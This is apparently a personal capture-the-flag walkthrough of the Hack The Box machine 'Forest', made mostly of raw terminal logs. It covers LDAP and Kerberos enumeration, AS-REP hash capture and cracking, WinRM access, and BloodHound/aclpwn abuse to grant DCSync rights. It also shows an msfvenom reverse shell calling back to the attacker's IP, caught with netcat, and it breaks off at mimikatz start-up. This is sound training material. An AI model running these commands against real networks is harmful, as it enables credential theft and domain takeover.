This is a windows machine from hack the box.
Nmap scan
└─$ nmap -sV -sC -oA active 10.10.10.161
Starting Nmap 7.94 ( https://nmap.org ) at 2023-09-06 06:08 EDT
Nmap scan report for 10.10.10.161
Host is up (0.34s latency).
Not shown: 989 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2023-09-06 10:15:54Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
445/tcp open 0ċ�V Windows Server 2016 Standard 14393 microsoft-ds (workgroup: HTB)
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
Service Info: Host: FOREST; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2023-09-06T10:16:17
|_ start_date: 2023-09-06T10:13:19
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: required
|_clock-skew: mean: 2h26m52s, deviation: 4h02m31s, median: 6m50s
| smb-os-discovery:
| OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
| Computer name: FOREST
| NetBIOS computer name: FOREST\x00
| Domain name: htb.local
| Forest name: htb.local
| FQDN: FOREST.htb.local
|_ System time: 2023-09-06T03:16:16-07:00
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 96.20 seconds
Trying 445 as potential low hanging fruit
┌──(kali㉿kali)-[~]
└─$ crackmapexec smb 10.10.10.161 -u "" up ""
SMB 10.10.10.161 445 FOREST [*] Windows Server 2016 Standard 14393 x64 (name:FOREST) (domain:htb.local) (signing:True) (SMBv1:True)
Domain is htb.local
Enumerating shares – Getting nothing much
┌──(kali㉿kali)-[~/HTB/Forest]
└─$ crackmapexec smb 10.10.10.161 --shares
SMB 10.10.10.161 445 FOREST [*] Windows Server 2016 Standard 14393 x64 (name:FOREST) (domain:htb.local) (signing:True) (SMBv1:True)
Traceback (most recent call last):
File "/usr/lib/python3/dist-packages/impacket/smbconnection.py", line 358, in connectTree
return self._SMBConnection.connect_tree(share)
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
File "/usr/lib/python3/dist-packages/impacket/smb.py", line 2835, in tree_connect_andx
Searching ldapsearch to try annd get usernames. Using the command “ldapsearch -x -H ldap://10.10.10.161 -b ‘DC=EGOTISTICAL-BANK,DC=LOCAL’ -s sub ‘(objectClass=person)’ sAMAccountName
”
┌──(kali㉿kali)-[~/HTB/Forest]
└─$ ldapsearch -x -H ldap://10.10.10.161 -s base namingcontexts
# extended LDIF
#
# LDAPv3
# base <> (default) with scope baseObject
# filter: (objectclass=*)
# requesting: namingcontexts
#
#
dn:
namingContexts: DC=htb,DC=local
namingContexts: CN=Configuration,DC=htb,DC=local
namingContexts: CN=Schema,CN=Configuration,DC=htb,DC=local
namingContexts: DC=DomainDnsZones,DC=htb,DC=local
namingContexts: DC=ForestDnsZones,DC=htb,DC=local
# search result
search: 2
result: 0 Success
# numResponses: 2
# numEntries: 1
Then suing the command to get the users and we grep only the users– ldapsearch -x -H ldap://10.10.10.161 -b ‘DC=htb,DC=LOCAL’ -s sub ‘(objectClass=person)’ sAMAccountName
uest
DefaultAccount
FOREST$
EXCH01$
$331000-VK4ADACQNUCA
SM_2c8eef0a09b545acb
SM_ca8c2ed5bdab4dc9b
SM_75a538d3025e4db9a
SM_681f53d4942840e18
SM_1b41c9286325456bb
SM_9b69f1b9d2cc45549
SM_7c96b981967141ebb
SM_c75ee099d0a64c91b
SM_1ffab36a2f5f479cb
HealthMailboxc3d7722
HealthMailboxfc9daad
HealthMailboxc0a90c9
HealthMailbox670628e
HealthMailbox968e74d
HealthMailbox6ded678
HealthMailbox83d6781
HealthMailboxfd87238
HealthMailboxb01ac64
HealthMailbox7108a4e
HealthMailbox0659cc1
sebastien
lucinda
andy
mark
santi
┌──(kali㉿kali)-[~/HTB/Forest]
└─$
Using kerbroot to find which users are valid after output to users.txt
┌──(kali㉿kali)-[~/HTB/Forest]
└─$ ./kerbrute userenum --dc 10.10.10.161 -d HTB.LOCAL users.txt
__ __ __
/ /_____ _____/ /_ _______ __/ /____
/ //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
/ ,< / __/ / / /_/ / / / /_/ / /_/ __/
/_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/
Version: v1.0.3 (9dad6e1) - 09/06/23 - Ronnie Flathers @ropnop
2023/09/06 06:28:11 > Using KDC(s):
2023/09/06 06:28:11 > 10.10.10.161:88
2023/09/06 06:28:11 > [+] VALID USERNAME: [email protected]
2023/09/06 06:28:11 > [+] VALID USERNAME: [email protected]
2023/09/06 06:28:11 > [+] VALID USERNAME: [email protected]
2023/09/06 06:28:11 > [+] VALID USERNAME: [email protected]
2023/09/06 06:28:11 > [+] VALID USERNAME: [email protected]
2023/09/06 06:28:11 > [+] VALID USERNAME: [email protected]
2023/09/06 06:28:11 > Done! Tested 6 usernames (6 valid) in 0.346 seconds
┌──(kali㉿kali)-[~/HTB/Forest]
adding HTB.local to the hosts file
└─$ cat /etc/hosts
127.0.0.1 localhost
127.0.1.1 kali
::1 localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
10.10.10.175 EGOTISTICAL-BANK.LOCAL
10.10.10.100 active.htb htb
10.190.10.161 htb.local
using GetNPusers.py from impacket with command example
┌──(kali㉿kali)-[/usr/share/doc/python3-impacket/examples]
└─$ ./GetNPUsers.py HTB.LOCAL/administrator
Impacket v0.11.0 - Copyright 2023 Fortra
Password:
^CTraceback (most recent call last):
File "/usr/share/doc/python3-impacket/examples/./GetNPUsers.py", line 470, in <module>
executer.run()
File "/usr/share/doc/python3-impacket/examples/./GetNPUsers.py", line 257, in run
ldapConnection = ldap.LDAPConnection('ldap://%s' % self.__target, self.baseDN, self.__kdcIP)
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
File "/usr/lib/python3/dist-packages/impacket/ldap/ldap.py", line 115, in __init__
self._socket.connect(sa)
KeyboardInterrupt
Not able to get any hashes for the users
┌──(kali㉿kali)-[/usr/share/doc/python3-impacket/examples]
└─$ ./GetNPUsers.py HTB.LOCAL/Lucinda
Impacket v0.11.0 - Copyright 2023 Fortra
Password:
[*] Cannot authenticate Lucinda, getting its TGT
[-] User Lucinda doesn't have UF_DONT_REQUIRE_PREAUTH set
┌──(kali㉿kali)-[/usr/share/doc/python3-impacket/examples]
└─$ ./GetNPUsers.py HTB.LOCAL/santi
Impacket v0.11.0 - Copyright 2023 Fortra
Password:
[*] Cannot authenticate santi, getting its TGT
[-] User santi doesn't have UF_DONT_REQUIRE_PREAUTH set
┌──(kali㉿kali)-[/usr/share/doc/python3-impacket/examples]
└─$ ./GetNPUsers.py HTB.LOCAL/mark
Impacket v0.11.0 - Copyright 2023 Fortra
Password:
[*] Cannot authenticate mark, getting its TGT
[-] User mark doesn't have UF_DONT_REQUIRE_PREAUTH set
┌──(kali㉿kali)-[/usr/share/doc/python3-impacket/examples]
└─$ ./GetNPUsers.py HTB.LOCAL/andy
Impacket v0.11.0 - Copyright 2023 Fortra
Password:
[*] Cannot authenticate andy, getting its TGT
[-] User andy doesn't have UF_DONT_REQUIRE_PREAUTH set
┌──(kali㉿kali)-[/usr/share/doc/python3-impacket/examples]
└─$ ./GetNPUsers.py HTB.LOCAL/sebastien
Impacket v0.11.0 - Copyright 2023 Fortra
Password:
[*] Cannot authenticate sebastien, getting its TGT
[-] User sebastien doesn't have UF_DONT_REQUIRE_PREAUTH set
Using the Command –? GetNPUsers.py -dc-ip 10.10.10.161 -request ‘htb.local/’
From chatGPT –> Effectively, the command is attempting to retrieve NTLM hashes for user accounts in the ‘htb.local’ domain from the domain controller at IP 10.10.10.161
that have the “Do not require Kerberos pre-authentication” setting enabled.
┌──(kali㉿kali)-[/usr/share/doc/python3-impacket/examples]
└─$ ./GetNPUsers.py -dc-ip 10.10.10.161 -request 'htb.local/'
Impacket v0.11.0 - Copyright 2023 Fortra
Name MemberOf PasswordLastSet LastLogon UAC
------------ ------------------------------------------------------ -------------------------- -------------------------- --------
svc-alfresco CN=Service Accounts,OU=Security Groups,DC=htb,DC=local 2023-09-06 07:04:05.238787 2019-09-23 07:09:47.931194 0x410200
[email protected]:1fc8155b51cbc86433259e43c839f3b6$debc0747dcb68f4f0b7780f062d7b876a40957451858e76dded149772ee51dbebf968c991765873fc8bcb04d92ea7f5ea9f43c1ab5ca60f11befbf0d2fa4b5e6e6428cc58911fed2c99f9d690cb5cd36c9b3e83b75843f201d97ee0064749b4631e07807cc9ef420a255ada51413c0a95749aab4ee0f080045291085edd2d1849dc72baf68cb7048855b0820de16db49b7544699463273c81c8480cbf79b8c13006b897a20599b5a897975e2bcc0d4fabae512bbba6061e95735b2dd64320bbb798f515a2f240b072fe70020622b79a6d86deabc0c0186dbe79445d121802d14e36b23029594
┌──(kali㉿kali)-[/usr/share/doc/python3-impacket/examples]
Check the hash mode
./hashcat --example-hashes | less
Hash mode #18200
Name................: Kerberos 5, etype 23, AS-REP
Category............: Network Protocol
Slow.Hash...........: No
Password.Len.Min....: 0
Password.Len.Max....: 256
Salt.Type...........: Embedded
Salt.Len.Min........: 0
Salt.Len.Max........: 256
Kernel.Type(s)......: pure, optimized
Example.Hash.Format.: plain
Example.Hash........: [email protected]:3e156ada591263b8a...102ac [Truncated, use --mach for full length]
Example.Pass........: hashcat
Benchmark.Mask......: ?b?b?b?b?b?b?b
Autodetect.Enabled..: Yes
Self.Test.Enabled...: Yes
Potfile.Enabled.....: Yes
Custom.Plugin.......: No
Plaintext.Encoding..: ASCII, HEX
Try and crack with hashcat and get the password s3rvice
[email protected]:7d0b8ffb982981828a17da5d8eee9ec3$25f69765117a64010ad204b7d80d9a6ccbbc3144012f87316b517b126518efe6e0fbb1c3ea1a19ad630c4e61e2a80a6257048f2c8446b4e81fccf6da76d049c1b221924b2904800ed0c695180312ae92870831140785547ab76fca82564e101c0c67e7893d1890ae65cd394cf048e711ddd5546fefee809c15241044dc9ce08c49ccbaf7db218b7927f0bca416c202b356dcd554bb03c1cbfeba4848c3dec11575c4a328c8610d893b95334e23a1ac527d53ff806b96e424dab29e557a7fe5077eb3c32bdd50135b0256f988c5c992bf8c45114d0b9660a528f6400059ae5dafcf072dfc98f4:s3rvice
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 18200 (Kerberos 5, etype 23, AS-REP)
Hash.Target......: [email protected]:7d0b8ffb982981...fc98f4
Time.Started.....: Wed Sep 6 07:08:52 2023 (7 secs)
Time.Estimated...: Wed Sep 6 07:08:59 2023 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 584.0 kH/s (1.52ms) @ Accel:512 Loops:1 Thr:1 Vec:8
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 4085760/14344385 (28.48%)
Rejected.........: 0/4085760 (0.00%)
Restore.Point....: 4083712/14344385 (28.47%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: s523480 -> s3r3ndipit
Hardware.Mon.#1..: Util: 71%
Started: Wed Sep 6 07:08:49 2023
Stopped: Wed Sep 6 07:09:01 2023
Using crackmap exec to check if we can pawn
┌──(kali㉿kali)-[/usr/bin]
└─$ crackmapexec winrm 10.10.10.161 -u svc-alfresco -p s3rvice
SMB 10.10.10.161 5985 FOREST [*] Windows 10.0 Build 14393 (name:FOREST) (domain:htb.local)
HTTP 10.10.10.161 5985 FOREST [*] http://10.10.10.161:5985/wsman
WINRM 10.10.10.161 5985 FOREST [+] htb.local\svc-alfresco:s3rvice (Pwn3d!)
using evil-rm and we get the user flag – 9b467960b7b0ddd353dd7a2ad776a254
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> cd ..
*Evil-WinRM* PS C:\Users\svc-alfresco> ls
Directory: C:\Users\svc-alfresco
Mode LastWriteTime Length Name
---- ------------- ------ ----
d-r--- 9/23/2019 2:16 PM Desktop
d-r--- 9/22/2019 4:02 PM Documents
d-r--- 7/16/2016 6:18 AM Downloads
d-r--- 7/16/2016 6:18 AM Favorites
d-r--- 7/16/2016 6:18 AM Links
d-r--- 7/16/2016 6:18 AM Music
d-r--- 7/16/2016 6:18 AM Pictures
d----- 7/16/2016 6:18 AM Saved Games
d-r--- 7/16/2016 6:18 AM Videos
*Evil-WinRM* PS C:\Users\svc-alfresco> cd Desktop
*Evil-WinRM* PS C:\Users\svc-alfresco\Desktop> ls
Directory: C:\Users\svc-alfresco\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 9/6/2023 3:13 AM 34 user.txt
*Evil-WinRM* PS C:\Users\svc-alfresco\Desktop> cat user.txt
9b467960b7b0ddd353dd7a2ad776a254
*Evil-WinRM* PS C:\Users\svc-alfre
upload and then run Sharphound after putting it in the right folder then download the zip file
nfo: Uploading /home/kali/HTB/Forest/SharpHound.exe to C:\Users\svc-alfresco\Desktop\SharpHound.exe
Data: 1395368 bytes of 1395368 bytes copied
Info: Upload successful!
*Evil-WinRM* PS C:\Users\svc-alfresco\Desktop> ls
Directory: C:\Users\svc-alfresco\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 9/6/2023 4:26 AM 1046528 SharpHound.exe
-ar--- 9/6/2023 3:13 AM 34 user.txt
*Evil-WinRM* PS C:\Users\svc-alfresco\Desktop> SharpHound.exe
The term 'SharpHound.exe' is not recognized as the name of a cmdlet, function, script file, or operable program. Check the spelling of the name, or if a path was included, verify that the path is correct and try again.
At line:1 char:1
+ SharpHound.exe
+ ~~~~~~~~~~~~~~
+ CategoryInfo : ObjectNotFound: (SharpHound.exe:String) [], CommandNotFoundException
+ FullyQualifiedErrorId : CommandNotFoundException
*Evil-WinRM* PS C:\Users\svc-alfresco\Desktop> ./SharpHound.exe
2023-09-06T04:28:17.2104460-07:00|INFORMATION|This version of SharpHound is compatible with the 4.3.1 Release of BloodHound
2023-09-06T04:28:17.6479741-07:00|INFORMATION|Resolved Collection Methods: Group, LocalAdmin, Session, Trusts, ACL, Container, RDP, ObjectProps, DCOM, SPNTargets, PSRemote
2023-09-06T04:28:17.7416956-07:00|INFORMATION|Initializing SharpHound at 4:28 AM on 9/6/2023
2023-09-06T04:28:18.5698497-07:00|INFORMATION|[CommonLib LDAPUtils]Found usable Domain Controller for htb.local : FOREST.htb.local
2023-09-06T04:28:18.7885786-07:00|INFORMATION|Flags: Group, LocalAdmin, Session, Trusts, ACL, Container, RDP, ObjectProps, DCOM, SPNTargets, PSRemote
2023-09-06T04:28:19.8667072-07:00|INFORMATION|Beginning LDAP search for htb.local
2023-09-06T04:28:20.0073312-07:00|INFORMATION|Producer has finished, closing LDAP channel
2023-09-06T04:28:20.0073312-07:00|INFORMATION|LDAP channel closed, waiting for consumers
2023-09-06T04:28:49.8983385-07:00|INFORMATION|Status: 0 objects finished (+0 0)/s -- Using 40 MB RAM
2023-09-06T04:29:03.4449219-07:00|INFORMATION|Consumers finished, closing output channel
2023-09-06T04:29:03.4917929-07:00|INFORMATION|Output channel closed, waiting for output task to complete
Closing writers
2023-09-06T04:29:03.7574559-07:00|INFORMATION|Status: 161 objects finished (+161 3.744186)/s -- Using 48 MB RAM
2023-09-06T04:29:03.7574559-07:00|INFORMATION|Enumeration finished in 00:00:43.9036240
2023-09-06T04:29:03.8369185-07:00|INFORMATION|Saving cache with stats: 118 ID to type mappings.
117 name to SID mappings.
0 machine sid mappings.
2 sid to domain mappings.
0 global catalog mappings.
2023-09-06T04:29:03.8519606-07:00|INFORMATION|SharpHound Enumeration Completed at 4:29 AM on 9/6/2023! Happy Graphing!
*Evil-WinRM* PS C:\Users\svc-alfresco\Desktop> ls
Directory: C:\Users\svc-alfresco\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 9/6/2023 4:29 AM 18650 20230906042902_BloodHound.zip
-a---- 9/6/2023 4:29 AM 19538 MzZhZTZmYjktOTM4NS00NDQ3LTk3OGItMmEyYTVjZjNiYTYw.bin
-a---- 9/6/2023 4:26 AM 1046528 SharpHound.exe
-ar--- 9/6/2023 3:13 AM 34 user.txt
*Evil-WinRM* PS C:\Users\svc-alfresco\Desktop> download 20230906042902_BloodHound.zip
Info: Downloading C:\Users\svc-alfresco\Desktop\20230906042902_BloodHound.zip to 20230906042902_BloodHound.zip
Info: Download successful!
*Evil-WinRM* PS C:\Users\svc-alfresco\Desktop>
Using bloodhound
Start Neo4j
┌──(kali㉿kali)-[~/HTB/Forest]
└─$ sudo neo4j console
[sudo] password for kali:
Directories in use:
home: /usr/share/neo4j
config: /usr/share/neo4j/conf
logs: /etc/neo4j/logs
plugins: /usr/share/neo4j/plugins
import: /usr/share/neo4j/import
data: /etc/neo4j/data
certificates: /usr/share/neo4j/certificates
licenses: /usr/share/neo4j/licenses
run: /var/lib/neo4j/run
Starting Neo4j.
2023-09-06 11:25:48.852+0000 INFO Starting...
2023-09-06 11:25:51.070+0000 INFO This instance is ServerId{012fd76f} (012fd76f-f868-4f49-8648-df3c0a92529c)
Go to http://localhost:7474/ and change the password
start bloodhound using bloodhound command and login
Go to analysys–>shortest path to domain admin
![[Pasted image 20230906194633.png]]
Found a very cool utility on github that helps with bloodhound autyomatically –> github .com/fox-it/
pip install aclpwn
┌──(kali㉿kali)-[~/HTB/Forest]
└─$ sudo pip install aclpwn
[sudo] password for kali:
Collecting aclpwn
Downloading aclpwn-1.0.0-py3-none-any.whl (17 kB)
Requirement already satisfied: impacket in /usr/lib/python3/dist-packages (from aclpwn) (0.11.0)
Requirement already satisfied: ldap3>=2.5 in /usr/lib/python3/dist-packages (from aclpwn) (2.9.1)
Collecting neo4j-driver (from aclpwn)
Downloading neo4j-driver-5.12.0.tar.gz (191 kB)
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 191.1/191.1 kB 1.5 MB/s eta 0:00:00
Installing build dependencies ... done
Getting requirements to build wheel ... done
Installing backend dependencies ... done
Preparing metadata (pyproject.toml) ... done
Requirement already satisfied: requests in /usr/lib/python3/dist-packages (from aclpwn) (2.31.0)
Requirement already satisfied: dsinternals in /usr/lib/python3/dist-packages (from impacket->aclpwn) (1.2.4)
Requirement already satisfied: pytz in /usr/lib/python3/dist-packages (from neo4j-driver->aclpwn) (2023.3)
Building wheels for collected packages: neo4j-driver
Building wheel for neo4j-driver (pyproject.toml) ... done
Created wheel for neo4j-driver: filename=neo4j_driver-5.12.0-py3-none-any.whl size=263951 sha256=d520dd450afa34d41f327d68a05f95d96a4e6a57307dd65b309d5bdc48a501ee
Stored in directory: /root/.cache/pip/wheels/a4/f7/ba/ecf94a7eb4eb6631820c99bb894dcc90477101cb90e6d46237
Successfully built neo4j-driver
Installing collected packages: neo4j-driver, aclpwn
Successfully installed aclpwn-1.0.0 neo4j-driver-5.12.0
WARNING: Running pip as the 'root' user can result in broken permissions and conflicting behaviour with the system package manager. It is recommended to use a virtual environment instead: https://pip.pypa.io/warnings/venv
Running aclpwn on our machine after starting bloodhound — ”aclpwn -f [email protected] -t htb.local -tt domain –database 127.0.0.1 -du neo4j -dp password -s 10.10.10.161 -sp s3rvice
”
aclpwn -f svc-alfresco.local -t htb.local -tt domain --database 127.0.0.1 -du neo4j -dp password -a 10.10.10.161 -sp s3rvice Traceback (most recent call last): File "/usr/local/bin/aclpwn", line 5, in <module> from aclpwn import main File "/usr/local/lib/python3.11/dist-packages/aclpwn/__init__.py", line 7, in <module> from aclpwn import utils, pathfinding, database, exploitation File "/usr/local/lib/python3.11/dist-packages/aclpwn/pathfinding.py", line 1, in <module> from aclpwn import utils, database File "/usr/local/lib/python3.11/dist-packages/aclpwn/database.py", line 2, in <module> from neo4j.v1 import GraphDatabase ModuleNotFoundError: No module named 'neo4j.v1'
This error is because we have neo4j v5 running and its expecting version 1
Will run this under an environment
sudo apt install python3.11-venv
python3 -m venv myenv
pip install aclpwn neo4j==1.*
We then run the same command under this environment still get the same error
Found fix via chatGPT
- Locate the
database.py
file foraclpwn
. Based on your error, it’s located at/usr/local/lib/python3.11/dist-packages/aclpwn/database.py
- changed from neo4j.v1 import GraphDatabase to from neo4j import GraphDatabase
After spending many hours with different versions of bloodhound and ne04j, i finally got the aclpwn to work
To install aclpwn
pip install aclpwn
Running bloodhound 3.05
┌──(kali㉿kali)-[~/Downloads/Bloodhound_3/BloodHound-linux-x64]
└─$ ls
BloodHound chrome_200_percent.pak icudtl.dat libffmpeg.so libvk_swiftshader.so LICENSE locales resources.pak swiftshader version
chrome_100_percent.pak chrome-sandbox libEGL.so libGLESv2.so libvulkan.so LICENSES.chromium.html resources snapshot_blob.bin v8_context_snapshot.bin vk_swiftshader_icd.json
┌──(kali㉿kali)-[~/Downloads/Bloodhound_3/BloodHound-linux-x64]
└─$ ./BloodHound
(node:12127) [DEP0005] DeprecationWarning: Buffer() is deprecated due to security and usability issues. Please use the Buffer.alloc(), Buffer.allocUnsafe(), or Buffer.from() methods instead.
starting neo4j
┌──(kali㉿kali)-[~]
└─$ sudo neo4j console
[sudo] password for kali:
Active database: graph.db
Directories in use:
home: /var/lib/neo4j
config: /etc/neo4j
logs: /var/log/neo4j
plugins: /var/lib/neo4j/plugins
import: /var/lib/neo4j/import
data: /var/lib/neo4j/data
certificates: /var/lib/neo4j/certificates
run: /var/run/neo4j
Starting Neo4j.
WARNING: Max 1024 open files allowed, minimum of 40000 recommended. See the Neo4j manual.
2023-09-09 12:33:43.663+0000 INFO ======== Neo4j 3.5.35 ========
2023-09-09 12:33:43.713+0000 INFO Starting...
2023-09-09 12:33:49.736+0000 INFO Bolt enabled on 127.0.0.1:7687.
2023-09-09 12:33:53.386+0000 INFO Started.
2023-09-09 12:33:55.678+0000 INFO Remote interface available at http://localhost:7474/
2023-09-09 12:35:20.565+0000 WARN The client is unauthorized due to authentication failure.
The Sharphound file we used is inside the source file for bloodhound 3.05
┌──(kali㉿kali)-[~/Downloads/Bloodhound_3]
└─$ ls
BloodHound-3.0.5 BloodHound-3.0.5.zip BloodHound-linux-x64 'BloodHound-linux-x64(1).zip'
┌──(kali㉿kali)-[~/Downloads/Bloodhound_3]
└─$ cd BloodHound-3.0.5
┌──(kali㉿kali)-[~/Downloads/Bloodhound_3/BloodHound-3.0.5]
└─$ ls
appveyor.yml deploy.sh index.html LICENSE-3RD-PARTY.md main.js package-lock.json renderer.js src webpack.config.production.js
BloodHoundExampleDB.db docs Ingestors LICENSE.md package.json README.md server.js webpack.config.development.js
┌──(kali㉿kali)-[~/Downloads/Bloodhound_3/BloodHound-3.0.5]
└─$ cd Ingestors
┌──(kali㉿kali)-[~/Downloads/Bloodhound_3/BloodHound-3.0.5/Ingestors]
└─$ ls
DebugBuilds SharpHound.exe SharpHound.ps1
┌──(kali㉿kali)-[~/Downloads/Bloodhound_3/BloodHound-3.0.5/Ingestors]
Running aclpwn — ~/.local/bin/aclpwn -f [email protected] -t htb.local -tt domain –database 127.0.0.1 -du neo4j -dp password -s 10.10.10.161 -sp s3rvice
└─$ ~/.local/bin/aclpwn -f [email protected] -t htb.local -tt domain --database 127.0.0.1 -du neo4j -dp password -s 10.10.10.161 -sp s3rvice
[!] Unsupported operation: GetChanges on HTB.LOCAL (Base,Domain)
[-] Invalid path, skipping
[!] Unsupported operation: GenericAll on EXCH01.HTB.LOCAL (Computer,Base)
[-] Invalid path, skipping
[+] Path found!
Path [0]: ([email protected])-[MemberOf]->(SERVICE [email protected])-[MemberOf]->(PRIVILEGED IT [email protected])-[MemberOf]->(ACCOUNT [email protected])-[GenericAll]->(EXCHANGE TRUSTED [email protected])-[MemberOf]->(EXCHANE WINDOWS [email protected])-[WriteDacl]->(HTB.LOCAL)
[+] Path found!
Path [1]: ([email protected])-[MemberOf]->(SERVICE [email protected])-[MemberOf]->(PRIVILEGED IT [email protected])-[MemberOf]->(ACCOUNT [email protected])-[GenericAll]->(EXCHANGE WINDOWS [email protected])-[WriteDacl]->(HTBLOCAL)
Please choose a path [0-1] 0
[-] Memberof -> continue
[-] Memberof -> continue
[-] Memberof -> continue
[-] Adding user SVC-ALFRESCO to group EXCHANGE TRUSTED [email protected]
[+] Added CN=svc-alfresco,OU=Service Accounts,DC=htb,DC=local as member to CN=Exchange Trusted Subsystem,OU=Microsoft Exchange Security Groups,DC=htb,DC=local
[-] Re-binding to LDAP to refresh group memberships of [email protected]
[+] Re-bind successful
[-] Memberof -> continue
[-] Modifying domain DACL to give DCSync rights to SVC-ALFRESCO
[+] Dacl modification successful
[+] Finished running tasks
[+] Saved restore state to aclpwn-20230909-084819.restore
Now i need to run mimikats so i will uplooad a reverse shell and capture it on my computer so i can run mimikatz as mimikatz has issues running on evil-winrm from previous experience
Creating reverse shell –msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.14.6 LPORT=443 -f exe -o shell.exe
Evil-WinRM PS C:\Users\svc-alfresco\Documents> ./shell.exe
└─$ msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.14.6 LPORT=443 -f exe -o shell.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 460 bytes
Final size of exe file: 7168 bytes
Saved as: shell.exe
┌──(kali㉿kali)-[~/HTB/Forest]
└─$ ls
20230909054106_BloodHound.zip aclpwn-20230909-084819.restore aclpwn.py active.gnmap active.nmap active.xml forest kerbrute SharpHound.exe shell.exe users.txt
┌──(kali㉿kali)-[~/HTB/Forest]
└─$ evil-winrm -i 10.10.10.161 -u svc-alfresco -p s3rvice
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> upload /home/kali/HTB/Forest/shell.exe
Info: Uploading /home/kali/HTB/Forest/shell.exe to C:\Users\svc-alfresco\Documents\shell.exe
Data: 9556 bytes of 9556 bytes copied
Info: Upload successful!
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> ls
Directory: C:\Users\svc-alfresco\Documents
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 9/9/2023 5:41 AM 15180 20230909054106_BloodHound.zip
-a---- 9/9/2023 5:41 AM 23611 MzZhZTZmYjktOTM4NS00NDQ3LTk3OGItMmEyYTVjZjNiYTYw.bin
-a---- 9/9/2023 5:40 AM 833536 SharpHound.exe
-a---- 9/9/2023 6:06 AM 7168 shell.exe
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> upload /home/kali/HTB/Forest/mimikatz.exe
Info: Uploading /home/kali/HTB/Forest/mimikatz.exe to C:\Users\svc-alfresco\Documents\mimikatz.exe
Data: 1236512 bytes of 1236512 bytes copied
Info: Upload successful!
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> ls
Directory: C:\Users\svc-alfresco\Documents
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 9/9/2023 5:41 AM 15180 20230909054106_BloodHound.zip
-a---- 9/9/2023 6:10 AM 927384 mimikatz.exe
-a---- 9/9/2023 5:41 AM 23611 MzZhZTZmYjktOTM4NS00NDQ3LTk3OGItMmEyYTVjZjNiYTYw.bin
-a---- 9/9/2023 5:40 AM 833536 SharpHound.exe
-a---- 9/9/2023 6:06 AM 7168 shell.exe
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> ./shell.exe
We capture the shell on our machine
┌──(kali㉿kali)-[~/Downloads/x64]
└─$ nc -nlvp 443
listening on [any] 443 ...
connect to [10.10.14.6] from (UNKNOWN) [10.10.10.161] 51307
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.
C:\Users\svc-alfresco\Documents>
We run the command lsadump::dcsync /domain:htb.local /user:Administrator which doesnt seem to be working
┌──(kali㉿kali)-[~/Downloads/x64]
└─$ nc -nlvp 443
listening on [any] 443 ...
connect to [10.10.14.6] from (UNKNOWN) [10.10.10.161] 51307
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.
C:\Users\svc-alfresco\Documents>./mimikatz.exe
./mimikatz.exe
'.' is not recognized as an internal or external command,
operable program or batch file.
C:\Users\svc-alfresco\Documents>mimikatz.exe
mimikatz.exe
.#####. mimikatz 2.1.1 (x64) #17763 Dec 9 2018 23:56:50
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo) ** Kitten Edition **
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( [email protected] )
## \ / ## > http://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( [email protected] )
'#####' > http://pingcastle.com / http://mysmartlogon.com ***/
